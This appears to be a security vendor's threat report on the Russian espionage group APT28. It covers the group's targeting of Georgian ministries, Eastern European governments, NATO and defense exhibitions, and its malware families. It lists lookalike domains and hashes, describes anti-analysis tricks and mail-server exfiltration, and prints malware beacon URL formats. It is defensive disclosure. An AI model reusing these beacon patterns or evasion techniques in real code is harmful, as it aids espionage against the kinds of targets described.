##### APT28:
###### A WINDOW INTO RUSSIA’S CYBER ESPIONAGE OPERATIONS?

### SECURITY


-----

**APT 28: A Window into Russia’s Cyber Espionage Operations?**

###### CONTENTS

EXECUTIVE SUMMARY....................................................................................................................................................................................................................................................................................3

APT28 TARGETING REFLECTS RUSSIAN INTERESTS.........................................................................................................................................................................6

APT28 interest in the Caucasus, Particularly Georgia............................................................................................................................................................7

APT28 Targeting of the Georgian Ministry of Internal Affairs (MIA)........................................................................................8

APT28 Targeting of the Georgian Ministry of Defense........................................................................................................................................9

APT28 Targeting a Journalist Covering the Caucasus....................................................................................................................................... 10

APT28’s Other Targets in the Caucasus........................................................................................................................................................................................ 11

APT28 Targeting of Eastern European Governments and Militaries.................................................................................................... 12

APT28 Targeting of NATO and Other European Security Organizations..................................................................................... 14

APT28 Targets European Defense Exhibitions................................................................................................................................................................ 16

Other APT28 Targets Are Consistent With Nation State Interests......................................................................................................... 17

APT28 MALWARE INDICATES SKILLED RUSSIAN DEVELOPERS......................................................................................................................... 19

Modular Implants Indicate a Formal Development Environment............................................................................................................... 24

APT28 Malware Indicates Russian Speakers in a Russian Time Zone................................................................................................. 25

Compile Times Align with Working Hours in Moscow and St. Petersburg................................................................ 27

CONCLUSION.................................................................................................................................................................................................................................................................................................................. 28

APPENDIX A: DISTINGUISHING THREAT GROUPS.......................................................................................................................................................................... 29

APPENDIX B: TIMELINE OF APT28 LURES.......................................................................................................................................................................................................... 30

APPENDIX C: SOURFACE/CORESHELL...................................................................................................................................................................................................................... 31

APPENDIX D: CHOPSTICK.................................................................................................................................................................................................................................................................... 35

APPENDIX E: OLDBAIT................................................................................................................................................................................................................................................................................. 43


-----

**APT 28: A Window into Russia’s Cyber Espionage Operations?**

###### EXECUTIVE SUMMARY

 Our clients often ask us to assess the threat Russia poses in cyberspace. Russia has long been a whispered frontrunner among capable nations for performing sophisticated network operations. This perception is due in part to the Russian government’s alleged involvement in the cyber attacks accompanying its invasion of Georgia in 2008, as well as the rampant speculation that Moscow was behind a major U.S. Department of Defense network compromise, also in 2008. These rumored activities, combined with a dearth of hard evidence, have made Russia into something of a phantom in cyberspace.


In this paper we discuss a threat group whose
malware is already fairly well-known in the
cybersecurity community. This group, unlike the
China-based threat actors we track, does not
appear to conduct widespread intellectual
property theft for economic gain. Nor have we
observed the group steal and profit from
financial account information.

The activity that we profile in this paper
appears to be the work of a skilled team of
developers and operators collecting intelligence
on defense and geopolitical issues – intelligence
that would only be useful to a government. We
believe that this is an advanced persistent
threat (APT) group engaged in espionage
against political and military targets including


the country of Georgia, Eastern European
governments and militaries, and European
security organizations since at least 2007.
They compile malware samples with Russian
language settings during working hours
consistent with the time zone of Russia’s major
cities, including Moscow and St. Petersburg.

While we don’t have pictures of a building,
personas to reveal, or a government agency to
name, what we do have is evidence of longstanding, focused operations that indicate a
government sponsor – specifically, a
government based in Moscow.

We are tracking this group as APT28.


1 Markoff, John. “Before the Gunfire, Cyberattacks”. The New York Times 12 August 2008. Web. http://www.nytimes.com/2008/08/13/technology/13cyber.html

2 Knowlton, Brian. “Military Computer Attack Confirmed”. The New York Times. 25 August 2010. Web. http://www.nytimes.com/2010/08/26/

technology/26cyber.html


-----

**APT 28: A Window into Russia’s Cyber Espionage Operations?**

###### KEY FINDINGS


###### APT28 targets insider information related to governments, militaries, and security organizations that would likely benefit the Russian government.

|GEORGIA APT28 likely seeks to collect intelligence about Georgia’s security and political dynamics by targeting officials working for the Ministry of Internal Affairs and the Ministry of Defense.|EASTERN EUROPE APT28 has demonstrated interest in Eastern European governments and security organizations. These victims would provide the Russian government with an ability to predict policymaker intentions and gauge its ability to influence public opinion.|SECURITY ORGANIZATIONS APT28 appeared to target individuals affiliated with European security organizations and global multilateral institutions. The Russian government has long cited European security organizations like NATO and the OSCE as existential threats, particularly during periods of increased tension in Europe.|
|---|---|---|


-----

**APT 28: A Window into Russia’s Cyber Espionage Operations?**

###### KEY FINDINGS

 - Malware compile times suggest that APT28 developers
have consistently updated their tools over the last
seven years.

 - APT28 malware, in particular the family of modular
backdoors that we call CHOPSTICK, indicates
a formal code development environment. Such an
environment would almost certainly be required to
track and define the various modules that can be
included in the backdoor at compile time.


###### Malware compile times suggest
 that APT28 developers have consistently updated their tools over the last seven years.

 Since 2007, APT28 has systematically evolved its malware, using flexible and lasting platforms indicative of plans for long-term use. The coding practices evident in the group’s malware suggest both a high level of skill and an interest in complicating reverse engineering efforts.

- APT28 tailors implants for specific victim
environments. They steal data by configuring their
implants to send data out of the network using a victim
network’s mail server.

- Several of APT28’s malware samples contain counteranalysis capabilities including runtime checks to
identify an analysis environment, obfuscated strings
unpacked at runtime, and the inclusion of unused
machine instructions to slow analysis.

|Col1|Since 2007, APT28 has systematically evolved its malware, using flexible and lasting platforms indicative of plans for long-term use. The coding practices evident in the group’s malware suggest both a high level of skill and an interest in complicating reverse engineering efforts.|
|---|---|


###### Indicators in APT28’s malware suggest that the group consists of
 Russian speakers operating during business hours in Russia’s major cities.

|More than half of the malware samples with Portable Executable (PE) resources that we have attributed to APT28 included Russian language settings (as opposed to neutral or English settings), suggesting that a significant portion of APT28 malware was compiled in a Russian language build environment consistently over the course of six years (2007 to 2013).|Over 96% of the malware samples we have attributed to APT28 were compiled between Monday and Friday. More than 89% were compiled between 8AM and 6PM in the UTC+4 time zone, which parallels the working hours in Moscow and St. Petersburg. These samples had compile dates ranging from mid-2007 to September 2014.|
|---|---|


-----

**APT 28: A Window into Russia’s Cyber Espionage Operations?**

###### Three themes in APT28’s targeting clearly reflect areas of specific interest to an Eastern European government, most likely the Russian government.

 APT28 TARGETING REFLECTS

# RUSSIAN INTERESTS


any of APT28’s targets align generally
with interests that are typical of any
government. However, three themes in

#### M

APT28’s targeting clearly reflects areas of specific
interest to an Eastern European government, most
likely the Russian government. These include the
Caucasus (especially the Georgian government),
Eastern European governments and militaries, and
specific security organizations.

APT28 uses spearphishing emails to target its
victims, a common tactic in which the threat group
crafts its emails to mention specific topics (lures)
relevant to recipients. This increases the
likelihood that recipients will believe that the
email is legitimate and will be interested in
opening the message, opening any attached files,
or clicking on a link in the body of the email. Since
spearphishing lures are tailored to the recipients


whose accounts APT28 hopes to breach, the
subjects of the lures provide clues as to APT28’s
targets and interests. For example, if the group’s
lures repeatedly refer to the Caucasus, then this
most likely indicates that APT28 is trying to gain
access to the accounts of individuals whose work
pertains to the Caucasus. Similarly, APT28’s practice
of registering domains that mimic those of legitimate
news, politics, or other websites indicates topics that
are relevant to APT28’s targets.

We identified three themes in APT28’s lures and
registered domains, which together are
particularly relevant to the Russian government.

In addition to these themes, we have seen APT28
target a range of political and military
organizations. We assess that the work of these
organizations serves nation state governments.


**APT 28: Three Themes**

The Caucasus,
particularly the
country of Georgia

Eastern European
governments and
militaries

The North Atlantic
Treaty Organization
(NATO) and other
European security
organizations


7 Bloomberg. “Neiman Marcus Hackers Set Off 60,000 Alerts While Bagging Credit Card Data.” February 2014.

8 Ibid.

9 Ibid.


-----

**APT 28: A Window into Russia’s Cyber Espionage Operations?**

###### APT28 INTEREST IN THE CAUCASUS,
 PARTICULARLY GEORGIA

 RUSSIA

Abkhazia

###### GEORGIA

 TURKEY

he Caucasus, a region that includes
Chechnya and other Russian republics and
the independent states of Georgia,

#### T

Armenia, and Azerbaijan, continues to experience
political unrest. The Georgian government’s
posture and ties to the West are a frequent
source of Moscow’s frustration, particularly after
the 2008 war. Overall, issues in the Caucasus
likely serve as focal points for Russian
intelligence collection efforts.


Since 2011, APT28 has used lures written in
Georgian that are probably intended to target
Georgian government agencies or citizens.
APT28 is likely seeking information on Georgia’s
security and diplomatic postures. Specifically,
the group has targeted the Georgian Ministry of
Internal Affairs (MIA) and the Ministry of
Defense (MOD). We also observed efforts to
target a journalist working on issues in the
Caucasus and a controversial Chechen news site.


-----

**APT 28: A Window into Russia’s Cyber Espionage Operations?**

**Georgian Ministry of Internal Affairs (MIA)**


###### APT28 made at least two specific attempts to target the Georgian Ministry of Internal Affairs.


###### APT28 Targeting of the Georgian Ministry of Internal Affairs (MIA)
The MIA harbors sensitive information about the
inner workings of Georgia’s security operations, the
country’s engagement in multilateral institutions,
and the government’s communications backbone. It
is responsible for[3]:

- Policing, internal security, and border patrols

- Counterintelligence

- Counterterrorism

- International relations

- Defense of Georgia’s strategic facilities
and assets

- “Operative-Technical” tasks

APT28 made at least two specific attempts to
target the MIA. In one case, we identified an
APT28 lure from mid-2013 that referenced
MIA-related topics and employed malware that
attempted to disguise its activity as legitimate
MIA email traffic. The lure consisted of a
weaponized Excel file that presented a decoy
document containing a list of Georgian driver’s

3 Georgian Ministry of Internal Affairs website http://police.ge/en/home


license numbers. The backdoor attempted to
establish a connection to a Georgian MIA mail
server and communicate via MIA email addresses
ending with “@mia.ge.gov”. Once connected to the
mail server, APT28’s backdoor sent an email
message using a subject line related to driver’s
licenses (in Georgian), and attached a file
containing system reconnaissance information.
This tactic could allow APT28 to obtain data from
the MIA’s network through a less-monitored
route, limiting the MIA network security
department’s abilities to detect the traffic.

In the second example of MIA targeting, an APT28
lure used an information technology-themed decoy
document that included references to the Windows
domain “MIA Users\Ortachala…” (Figure 1).
This probably referred to the MIA facility in the
Ortachala district of Tbilisi, Georgia’s capital city.
The decoy document also contains metadata listing
“MIA” as the company name and “Beka Nozadze”[4]
as an author, a possible reference to a system
administrator in Tbilisi. The text of the document
purports to provide domain and user group setup


4 Queries on the author yielded a LinkedIn page for a person of the same name who serves as a system administrator in Tbilisi.


-----

**APT 28: A Window into Russia’s Cyber Espionage Operations?**

information for internal Windows XP and Windows
7 systems. APT28 possibly crafted this document
to appear legitimate to all MIA system users and
intended to breach the MIA network specifically
using the embedded malware.

###### APT28 Targeting of the Georgian Ministry of Defense
APT28 also appeared to target Georgia’s MOD
along with a U.S. defense contractor that was


training the Georgian military. APT28 used a lure
document that installed a SOURFACE downloader
(further discussed in the Malware section) and
contained a listing of birthdays for members of a
working group between the Georgian MOD and
the U.S. defense contractor. The U.S. contractor
was involved in a working group to advise the MOD
and Georgian Armed Forces, assess Georgia’s
military capabilities, and develop a military training
program for the country.


**Figure 1: Georgian MIA-related decoy**


-----

**APT 28: A Window into Russia’s Cyber Espionage Operations?**

**Figure 2: Excerpt of APT28’s letter to a journalist writing on Caucasus-related issues**

We wish our cooperation will be both profitable and trusted. Our aim in the Caucasian region is
to help people who struggle for their independence, liberty and human rights. We all know, that
world is often unfair and cruel, but all together we can make it better.

Send your articles on this email – in Russian or English, please. There are some difficulties with
Caucasian languages, but we’ll solve the problem pretty soon, I hope.

###### Targeting journalists could provide APT28 and its sponsors with a way to monitor public opinion, identify dissidents, spread disinformation, or facilitate further targeting.


We believe that APT28’s targeting of the MOD
aligns with Russian threat perceptions. The
growing U.S.-Georgian military relationship has
been a source of angst for Russia. Georgia and
Russia severed diplomatic relations following the
Russia-Georgia War in 2008, and Georgia has
since sought to align itself more closely with
western security organizations. Additionally, in
June 2014, despite Russia’s vocal objections,
Georgia, along with Ukraine and Moldova, signed
association accords with the EU.[5] This move
placed all three countries more firmly in the EU’s
political, economic, and security spheres of
influence. Georgian military security issues,
particularly with regard to U.S. cooperation and
NATO, provide a strong incentive for Russian
state-sponsored threat actors to steal information
that sheds light on these topics.


###### APT28 Targeting a Journalist Covering the Caucasus
Another one of APT28’s lures appeared to target
a specific journalist covering issues in the
Caucasus region. In late 2013, APT28 used a lure
that contained a letter addressing a journalist by
his first name and claiming to originate from a
“Chief Coordinator” in Reason Magazine’s
“Caucasian Issues Department” - a division that
does not appear to exist.[6] (Reason Magazine is a
US-based magazine) The letter welcomed the
individual as a contributor and requested topic
ideas and identification information in order to
establish him at the magazine. In the background,
the decoy document installed a SOURFACE
backdoor on the victim’s system.


5 “The EU’s Association Agreements with Georgia, the Republic of Moldova and Ukraine”. European Union Press Release Database. 23 June 2014.

Web. http://e uropa.eu/rapid/press-release_MEMO-14-430_en.htm

6 We attempted to identify candidate journalists in the country. One of these was a Georgian national of Chechen descent, whose work appears to center on

Chechen and human rights issues. Ultimately, however, we cannot confirm the identity of the target(s).


-----

**APT 28: A Window into Russia’s Cyber Espionage Operations?**

**Table 1: Examples of APT28 domains imitating organizations in the Caucasus**

**APT28 Domain** **Real Domain**

The Kavkaz Center / The Caucasus Center, an international Islamic news agency with coverage of
kavkazcentr[.]info
Islamic issues, particularly Russia and Chechnya

rnil[.]am Armenian military (mil.am)

The body of the letter suggests that APT28 actors
are able to read at least two languages – Russian
and English. The grammar of the letter also
indicates that English is not the author’s first
language, despite it purportedly originating from a
US-based magazine. This implies that Russian may
be the APT28 author’s preferred language.

Targeting journalists could provide APT28 and its
sponsors with a way to monitor public opinion,
identify dissidents, spread disinformation, or
facilitate further targeting. Several other nation
states are suspected of targeting journalists and
dissidents to monitor their activity, including China
and Iran.[7,8] Journalists in the Caucasus working on
Caucasus independence issues would be a prime
target for intelligence collection for Moscow.
Journalists critical of the Kremlin have long
been targets of surveillance and harassment,
and a number of governments and human
rights organizations have publicly criticized the
government for its treatment of journalists and its
increasing consolidation of control over the media.[9]

|APT28 Domain|Real Domain|
|---|---|
|kavkazcentr[.]info|The Kavkaz Center / The Caucasus Center, an international Islamic news agency with coverage of Islamic issues, particularly Russia and Chechnya (kavkazcenter.com)|
|rnil[.]am|Armenian military (mil.am)|


###### APT28’s Other Targets in the Caucasus
We have seen APT28 register at least two
domains mimicking the domains of legitimate
organizations in the Caucasus, as shown in the
table below. One APT28 domain imitated a key
Chechen-focused news website, while the other
appeared to target members of the Armenian
military by hosting a fake login page.

Of particular note, the Kavkaz Center is a
Chechen-run website designed to present an
alternative view to the long-running conflict
between Russia and Chechen separatists. In
2004[10] and 2013,[11] Russia’s Foreign Minister
voiced his displeasure that a Swedish company
continues to host the Kavkaz Center website.


7 Moran, Ned, Villeneuve, Nart, Haq, Thofique, and Scott, Mike. “Operation Saffron Rose”. FireEye. 13 May 2014. Web. http://www.fireeye.com/blog/technical/

malware-research/2014/05/operation-saffron-rose.html

8 The New York Times publicly disclosed their breach by APT12, which they assess was motivated by the China-based actors’ need to know what the

newspaper was publishing about a controversial topic related to corruption and the Chinese Communist Party’s leadership.

9 “Russia”. Freedom House Press Release. 2013. Web. http://www.freedomhouse.org/report/freedom-press/2013/russia#.VD8fe9R4rew

10“Chechen website promotes terror: Lavrov”. UPI. 16 November 2014. Web. http://www.upi.com/Top_News/2004/11/16/Chechen-website-promotes
terror-Lavrov/UPI-11601100627922/

11“Lavrov urges Sweden to ban Chechen website server” The Voice of Russia. 15 May 2013. Web. http://voiceofrussia.com/news/2013_05_15/Lavrov-urges
Sweden-to-ban-Chechen-website-server/


-----

**APT 28: A Window into Russia’s Cyber Espionage Operations?**

###### APT28 TARGETING OF EASTERN EUROPEAN GOVERNMENTS AND MILITARIES


astern European countries’ political and
military postures are traditionally core Russian
government interests. The Kremlin has long

#### E

regarded the former Soviet Republics and satellite
states as in its sphere of economic, political, and
military interest. Over the past two decades, as many
of these states joined NATO and the EU, Russia has
attempted to regain its influence in the region. Many
of APT28’s targets parallel this continued focus on
Eastern European governments and militaries.

###### APT28 Targets Eastern European Government Organizations
We have evidence that APT28 made at least two
attempts to compromise Eastern European
government organizations:

                              - In a late 2013 incident, a FireEye device
deployed at an Eastern European Ministry of
Foreign Affairs detected APT28 malware in
the client’s network.

                              - More recently, in August 2014 APT28 used a
lure (Figure 3) about hostilities surrounding a
Malaysia Airlines flight downed in Ukraine in
a probable attempt to compromise the Polish
government. A SOURFACE sample employed
in the same Malaysia Airlines lure was
referenced by a Polish computer security
company in a blog post.[12] The Polish security
company indicated that the sample was “sent
to the government,” presumably the Polish
government, given the company’s location
and visibility.

12 “MHT, MS12-27 Oraz *malware*.info” Malware@Prevenity. 11 August 2014. Web. http://malware.prevenity.com/2014/08/malware-info.html


-----

**APT 28: A Window into Russia’s Cyber Espionage Operations?**

**Table 2: Examples of APT28 domains imitating legitimate Eastern European organization names**

**APT28 Domain** **Real Domain**

standartnevvs[.]com Bulgarian Standart News website (standartnews.com)

novinitie[.]com, n0vinite[.]com Bulgarian Sofia News Agency website (novinite.com)

qov[.]hu[.]com Hungarian government domain (gov.hu)

q0v[.]pl, mail[.]q0v[.]pl Polish government domain (gov.pl) and mail server domain (mail.gov.pl)

poczta.mon[.]q0v[.]pl Polish Ministry of Defense mail server domain (poczta.mon.gov.pl)

###### We have evidence that APT28 made at least two attempts to compromise Eastern European government organizations.

|APT28 Domain|Real Domain|
|---|---|
|standartnevvs[.]com|Bulgarian Standart News website (standartnews.com)|
|novinitie[.]com, n0vinite[.]com|Bulgarian Sofia News Agency website (novinite.com)|
|qov[.]hu[.]com|Hungarian government domain (gov.hu)|
|q0v[.]pl, mail[.]q0v[.]pl|Polish government domain (gov.pl) and mail server domain (mail.gov.pl)|
|poczta.mon[.]q0v[.]pl|Polish Ministry of Defense mail server domain (poczta.mon.gov.pl)|


APT28 has registered domains similar to those of
legitimate Eastern European news sites and
governments, listed in Table 2. These domain
registrations not only suggest that APT28 is
interested in Eastern European political affairs,
but also that the group targets Eastern European
governments directly.

In addition, APT28 used one domain for command
and control sessions (baltichost[.]org) that was
themed after the Baltic Host exercises. Baltic Host
is a multinational logistics planning exercise, hosted
annually since 2009 by one of the three Baltic
States (Estonia, Latvia, and Lithuania, all three of
which are on Russia’s border) on a rotational basis.
In June 2014, this event was integrated with a
larger U.S. Army training event, and focused on
exercises to improve interoperability with regional
allies and partners.[13, 14 ]


This domain registration suggests that APT28
sought to target individuals either participating in
the exercises or interested in Baltic military and
security matters. Such targets would potentially
provide APT28 with sensitive tactical and
strategic intelligence concerning regional military
capabilities and relationships. These exercises are
a particular point of interest in Moscow: proKremlin press cited Russia’s interpretation of
these military exercises and NATO’s involvement
as a “sign of aggression,” and Russia’s Foreign
Minister publicly stated that the exercise was “a
demonstration of hostile intention.”[15]


13 “Saber Strike and Baltic Host kick off in Latvia, Lithuania and Estonia’. Estonian Defense Forces. 9 June 2014. Web. 11 June 2014. http://www.mil.ee/en/
news/8251/saber-strike-and-baltic-host-kick-off-in-latvia,-lithuania-and-estonia

14 “Baltic Host 2014 rendering host nation support for the training audience of Exercise Saber Strike 2014 and repelling faked cyber-attacks”. Republic of

Lithuania Ministry of National Defense. 12 June 2014. Web. http://www.kam.lt/en/news_1098/current_issues/baltic_host_2014_rendering_host_nation_
support_for_the_training_audience_of_exercise_saber_strike_2014_and_repelling_faked_cyber-attacks.html

15 “Tanks, troops, jets: NATO countries launch full-scale war games in Baltic”. Russia Today. 9 June 2014. Web. http://rt.com/news/164772-saber-strike
exercise-nato/


-----

**APT 28: A Window into Russia’s Cyber Espionage Operations?**

###### APT28 TARGETING OF NATO AND OTHER EUROPEAN SECURITY ORGANIZATIONS

PT28’s lures and domain registrations also
demonstrate their interest in NATO and
other European security organizations.

#### A

NATO remains a chief Russian adversary, or in the
words of Russia’s 2010 military doctrine, a “main
external military danger” particularly as it moves
“closer to the borders of the Russian Federation.”[16]
As the traditional western counterweight to the
Soviet Union, Russia regards NATO, particularly
NATO’s eastward expansion, as a threat to Russia’s
strategic stability. APT28 also registered a domain
name imitating the Organization for Security
and Cooperation in Europe (OSCE), an
intergovernmental organization that has cited
widespread fraud in numerous Russian state


elections. Insider information about NATO, the
OSCE and other security organizations would
inform Russian political and military policy.

Several of the domains APT28 registered imitated
NATO domain names, including those of NATO
Special Operations Headquarters and the NATO
Future Forces Exhibition. We also observed a user
that we suspect works for NATO HQ submit an
APT28 sample to VirusTotal, probably as a result
of receiving a suspicious email.


**Table 3: Examples of APT28 domains imitating legitimate NATO and security websites**

**APT28 Domain** **Real Domain**

nato.nshq[.]in NATO Special Operations Headquarters (nshq.nato.int)

natoexhibitionff14[.]com NATO Future Forces 2014 Exhibition & Conference

login-osce[.]org Organization for Security and Cooperation in Europe

16 The Military Doctrine of the Russian Federation, approved by Presidential edict on 5 February 2010.

|APT28 Domain|Real Domain|
|---|---|
|nato.nshq[.]in|NATO Special Operations Headquarters (nshq.nato.int)|
|natoexhibitionff14[.]com|NATO Future Forces 2014 Exhibition & Conference (natoexhibition.org)|
|login-osce[.]org|Organization for Security and Cooperation in Europe (osce.org)|


-----

**APT 28: A Window into Russia’s Cyber Espionage Operations?**


APT28 also demonstrated an interest in defense
attaches working in European countries. We identified
an APT28 lure containing a decoy document with a list
of British officers and U.S. and Canadian military
attachés in London.

Finally, APT28 used a lure that contained an apparent
non-public listing of contact information for defense
attachés in the “Ankara Military Attaché Corps (AMAC),”
which appears to be a professional organization of
defense attachés in Turkey.


**Figure 5: Ankara**
Military Attache Corps
decoy document


-----

**APT 28: A Window into Russia’s Cyber Espionage Operations?**

###### APT28 Targets European
 Defense Exhibitions
In addition to targeting European security
organizations and governments, it appears that
APT28 is targeting attendees of European
defense exhibitions. Some of the APT28registered domains imitated those of defense
events held in Europe, such as the Farnborough
Airshow 2014, EuroNaval 2014, EUROSATORY
2014, and the Counter Terror Expo. In September
2014, APT28 registered a domain (smigrouponline.co[.]uk) that appeared to mimic that for the


SMi Group, a company that plans events for the
“Defence, Security, Energy, Utilities, Finance and
Pharmaceutical sectors.” Among other events, the
SMi Group is currently planning a military satellite
communications event for November 2014.

Targeting organizations and professionals
involved in these defense events would likely
provide APT28 with an opportunity to procure
intelligence pertaining to new defense
technologies, as well as the victim organizations’
operations, communications, and future plans.


###### Targeting organizations and professionals involved in these defense events would likely provide APT28 with an opportunity to procure intelligence pertaining to new defense technologies.


-----

**APT 28: A Window into Russia’s Cyber Espionage Operations?**

###### OTHER APT28 TARGETS ARE CONSISTENT WITH NATION STATE INTERESTS

PT28 has targeted a variety of organizations
that fall outside of the three themes we
highlighted above. However, we are not

#### A

profiling all of APT28’s targets with the same
detail because they are not particularly indicative
of a specific sponsor’s interests. They do indicate
parallel areas of interest to many governments
and do not run counter to Russian state interests.

APEC

Other probable APT28 targets that we have
identified: NATO

- Norwegian Army (Forsvaret)

OSCE

- Government of Mexico

- Chilean Military

- Pakistani Navy

- U.S. Defense Contractors

- European Embassy in Iraq

- Special Operations Forces Exhibition (SOFEX)

**OTHER**

in Jordan

- Defense Attaches in East Asia

- Asia-Pacific Economic Cooperation (APEC)

- Al-Wayi News Site

|INTERNATIONAL ORGANIZATION|Col2|Col3|Col4|
|---|---|---|---|
|European Commission||||
|UN Office for the Coordination of Humanitarian Affairs||||
|APEC||||
|NATO||||
|OSCE||||
|World Bank||||
|||||

|OTHER|Col2|Col3|
|---|---|---|
|Hizb ut-Tahir|||
|Chechnya Global|||
|Diplomatic Forum|||
|Military Trade Shows|||


-----

**APT 28: A Window into Russia’s Cyber Espionage Operations?**

US DEFENSE ATTACHES AND US DEFENSE CONTRACTORS

**KEY**


-----

**APT 28: A Window into Russia’s Cyber Espionage Operations?**

###### Our analysis of some of the group’s more commonly used tools indicates that APT28 has been systematically updating their malware since 2007.

 APT28 MALWARE INDICATES
## SKILLED RUSSIAN DEVELOPERS


PT28’s tools are suggestive of the group’s
skills, ambitions, and identity. Our analysis
of some of the group’s more commonly

#### A

used tools indicates that APT28 has been
systematically updating their tools since 2007.
APT28 is most likely supported by a group of
developers creating tools intended for long-term
use and versatility, who make an effort to
obfuscate their activity. This suggests that APT28
receives direct ongoing financial and other
resources from a well-established organization,
most likely a nation state government. APT28’s
malware settings suggest that the developers
have done the majority of their work in a Russian
language build environment during Russian
business hours, which suggests that the Russian
government is APT28’s sponsor.

Some of APT28’s more commonly used tools are
the SOURFACE downloader, its second stage
backdoor EVILTOSS, and a modular family of
implants that we call CHOPSTICK.



- **SOURFACE: This downloader is typically**
called Sofacy within the cyber security
community. However because we have
observed the name “Sofacy” used to refer to
APT28 malware generally (to include the
SOURFACE dropper, EVILTOSS,
CHOPSTICK, and the credential harvester
OLDBAIT), we are using the name
SOURFACE to precisely refer to a specific
downloader. This downloader obtains a
second-stage backdoor from a C2 server.
CORESHELL is an updated version of
SOURFACE.

- **EVILTOSS: This backdoor has been delivered**
through the SOURFACE downloader to gain
system access for reconnaissance,
monitoring, credential theft, and shellcode
execution.

- **CHOPSTICK: This is a modular implant**
compiled from a software framework that
provides tailored functionality and flexibility.


-----

**APT 28: A Window into Russia’s Cyber Espionage Operations?**

A number of the malware variants that we profile
below, especially the CHOPSTICK family,
demonstrate formal coding practices indicative of
methodical, diligent programmers. The modularity
of CHOPSTICK alone, with its flexible and lasting
platform, demonstrates planning for long-term
use and versatility. We have also noted that
APT28 tailors implants to their target
environments, configuring them to use local
network resources such as email servers.

APT28 has attempted to obfuscate their code and
implement counter-analysis techniques:



- One of the latest samples of CORESHELL
includes counter-reverse engineering tactics
via unused machine instructions. This would
hinder static analysis of CORESHELL behavior
by creating a large amount of unnecessary
noise in the disassembly.

- A number of CORESHELL droppers also
conduct runtime checks, attempting to
determine if they are executing in an analysis
environment, and if so, they do not trigger
their payloads.

- Many samples across the SOURFACE/
CORESHELL, CHOPSTICK, and EVILTOSS


-----

**APT 28: A Window into Russia’s Cyber Espionage Operations?**

malware families obfuscate strings that are
decoded at runtime. Two of the malware
families (SOURFACE/CORESHELL and
EVILTOSS) use the same decryption
sequence and similar algorithms for string
encoding and decoding. These families
encode their strings at compile time using a
custom stream cipher. From a high level,
these ciphers share a similar design across
the malware families but differ slightly in the
internal arithmetic operations.

               - APT28 has employed RSA encryption to
protect files and stolen information moved
from the victim’s network to the controller.


APT28 has made incremental and systematic
changes to the SOURFACE downloader and its
surrounding ecosystem since as early as 2007.
These changes indicate a long-standing and
dedicated development effort behind APT28. We
have observed samples of the SOURFACE
downloader compiled between 2007 and 2014.
We call SOURFACE (samples are frequently
named netids.dll) a first stage downloader
because its primary job is to retrieve a second
stage payload from a C2 server. Until 2013, the
SOURFACE downloader used hard-coded IP
addresses for C2 communications, whereas the
future CORESHELL samples use domains.


###### EVOLUTION OF
 SOURFACE ECOSYSTEM INDICATES SYSTEMATIC DEVELOPMENT

 WHAT IS A MALWARE ECOSYSTEM?

First, a malware family is a collection of malware in which each sample shares a significant
amount of code with all of the others. There are exceptions: for example, some files
contain public and standard code libraries that we do not take into consideration
when making a family determination.

A malware ecosystem is a group of malware families that work together to perform
the same objective. Perhaps the simplest and most typical ecosystem
is a dropper and a backdoor that are used together. They may not share the
same code structure, but they are related because one drops and installs
the other.

The ecosystem surrounding the SOURFACE downloader frequently
consists of a dropper, which installs SOURFACE. The SOURFACE
downloader then receives another dropper from its C2 server, and
this second dropper installs a second stage backdoor, which is
usually EVILTOSS.


-----

**APT 28: A Window into Russia’s Cyber Espionage Operations?**

In April 2013, based on compile time, the group
began to make significant alterations to the **Figure 7: Example of modified SOURFACE vs. CORESHELL communications**
SOURFACE downloader. They started by
changing the compiled DLL name to “coreshell.dll”
and making minor changes to the network
communications, as seen in Figure 7. SOURFACE URL for a sample compiled April 2013:

http://[hostname]/~book/cgi-bin/brvc.cgi?WINXPSP3c95b87a4-05_01

The hostname, volume serial number and OS
version data are encoded in the new URL format. CORESHELL URL for a sample compiled April 2013:
As seen in the table below, the SOURFACE/ http://[hostname]/~xh/ch.cgi?enhkZm1GNmY1YWg0eGcxMGQ1MDUwMQ==
CORESHELL developers also made other
modifications that changed the exported function
name and file size over time.

**Table 4: Evolution of SOURFACE downloader over time**

###### MD5 Size Compile Date Export Name Notes

272f0fde35dbdfccbca1e33373b3570d 11264 2013-04-16 10:49:25 UTC Init1 17

8b92fe86c5b7a9e34f433a6fbac8bc3a 14848 2013-08-06 07:53:03 UTC Initialize 18

9eebfebe3987fec3c395594dc57a0c4c 12800 2013-08-14 10:48:59 UTC Initialize 19

da2a657dc69d7320f2ffc87013f257ad 12800 2013-08-21 07:52:10 UTC Initialize Same as previous.

1259c4fe5efd9bf07fc4c78466f2dd09 12800 2013-10-03 09:21:10 UTC Initialize Same as previous.

3b0ecd011500f61237c205834db0e13a 43520 2014-02-13 16:29:36 UTC Applicate 20

5882fda97fdf78b47081cc4105d44f7c 45056 2014-05-13 15:18:24 UTC Applicate 21

791428601ad12b9230b9ace4f2138713 45056 2014-05-13 16:42:26 UTC Applicate Same as previous.

ead4ec18ebce6890d20757bb9f5285b1 45056 2014-07-25 15:44:04 UTC Applicate Same as previous.

48656a93f9ba39410763a2196aabc67f 112640 2014-07-30 11:13:24 UTC Applicate 22

8c4fa713c5e2b009114adda758adc445 112640 2014-07-30 11:13:24 UTC Applicate Same as previous.

17 SOURFACE with minor changes to network communications (see Figure 7).

18 Basic anti-debug measures added (process listing, rand timing, is DebuggerPresent).

19 Switches from loading a secondary DLL (netui.dll/WinIDS.dll) to uploading the contents of %temp%\chkdbg.log.

20 Statically links msvcrt library.

21 Statically links msvcrt library and the strings used to identify the imported libraries and functions are reversed prior to being used, then reversed back after use.

22This version added assembly level obfuscation, which slows down analysis. This variant requires the OS to be at least Windows Vista.

|MD5|Size|Compile Date|Export Name|Notes|
|---|---|---|---|---|
|272f0fde35dbdfccbca1e33373b3570d|11264|2013-04-16 10:49:25 UTC|Init1|17|
|8b92fe86c5b7a9e34f433a6fbac8bc3a|14848|2013-08-06 07:53:03 UTC|Initialize|18|
|9eebfebe3987fec3c395594dc57a0c4c|12800|2013-08-14 10:48:59 UTC|Initialize|19|
|da2a657dc69d7320f2ffc87013f257ad|12800|2013-08-21 07:52:10 UTC|Initialize|Same as previous.|
|1259c4fe5efd9bf07fc4c78466f2dd09|12800|2013-10-03 09:21:10 UTC|Initialize|Same as previous.|
|3b0ecd011500f61237c205834db0e13a|43520|2014-02-13 16:29:36 UTC|Applicate|20|
|5882fda97fdf78b47081cc4105d44f7c|45056|2014-05-13 15:18:24 UTC|Applicate|21|
|791428601ad12b9230b9ace4f2138713|45056|2014-05-13 16:42:26 UTC|Applicate|Same as previous.|
